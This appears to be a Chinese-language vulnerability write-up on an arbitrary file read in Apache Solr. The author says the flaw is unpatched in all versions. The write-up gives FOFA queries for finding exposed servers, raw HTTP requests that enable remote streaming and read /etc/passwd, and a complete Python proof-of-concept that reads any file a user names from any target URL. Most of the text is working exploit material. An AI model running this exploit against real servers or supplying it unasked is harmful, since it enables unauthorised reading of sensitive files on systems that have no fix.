一、漏洞背景
Apache Solr 全版本存在任意文件讀取漏洞,攻擊者可以在未授權的情況下獲取目標系統的敏感文件,為什么說是全版本呢因為由於目前官方不予修復該漏洞,所以無安全版本。
二、網絡空間搜索:
fofa語法如下
app="Apache-Solr"
app="Solr"
app="Solr" || app="Apache-Solr"
三、漏洞驗證
URL1:http://ip:port/solr/admin/cores?indexInfo=false&wt=json
URL2:修改payload數據包
POST /solr/ik_core/config HTTP/1.1
Host: 116.62.xxx.xx:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
看到標紅的相應字符串,說明存在漏洞
URL3:繼續修改數據包
POST /solr/ik_core/debug/dump?param=ContentStreams HTTP/1.1
Host: 116.62.00.00:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
stream.url=file:///etc/passwd
POC
# coding:utf8
# Apache Solr 全版本通殺
# Fofa: app="Apache-Solr" || app="Solr"
import requests
import json
import sys
import time
def title():
print("\033[31m-------------------------------------------------+\033[0m")
print("\033[31m------------ Apache Solr 任意文件讀取 -------------+\033[0m")
print("\033[31m----- Use: python3 Apache Solr File Read.py -----+\033[0m")
print("\033[31m-------------------------------------------------+\033[0m")
time.sleep(2)
def get_name(url):
url_1 = url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
res = requests.get(url=url_1)
#將json數據字典化
name = str(list(json.loads(res.text)["status"])[0])
print("[!] 獲取到目標系統name:\033[31m%s\033[0m"%name+" [0]"+"URL:"+url+"/solr/"+name+"/config")
return name
except Exception as e:
print("[!] 目的系統URL無法利用。",e)
sys.exit(0)
def check_vul(url, name):
url_2 = url +"/solr/" + name + "/config"
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
try:
res = requests.post(url=url_2,data=data)
if "This response format is experimental" in res.text and res.status_code == 200:
print("[!] \033[31m目標系統存在漏洞\033[0m")
else:
print("目標系統不存在漏洞")
sys.exit(0)
except Exception as e:
print("[!] 目標系統請求失敗")
sys.exit(0)
def read_files(url,name,file_name):
url = url + "/solr/" + name + "/debug/dump?param=ContentStreams"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = "stream.url=file://{}".format(file_name)
try:
res = requests.post(url=url,headers=headers,data=data)
if "No such file or directory" in res.text:
print("[!] 目標系統讀取文件失敗!")
sys.exit(0)
else:
print("正在讀取文件..........")
content = (json.loads(res.text)["streams"][0]["stream"])
print("[o] 讀取文件內容為:\n\033[34m{}\033\0m".format(content))
except Exception as e:
print("[!] 目標系統似乎意外中斷了", e)
sys.exit(0)
if __name__ == "__main__":
title()
url = str(input("\033[31m\n[!] 請輸入目標系統URL: \033[0m"))
name = get_name(url)
check_vul(url, name)
file_name = str(input("\033[31m[!] 請輸入要讀取的文件:\033[0m"))
read_files(url, name, file_name)
參考:https://mp.weixin.qq.com/s/y3lroUKOKaIpftWmWPzQIQ
完!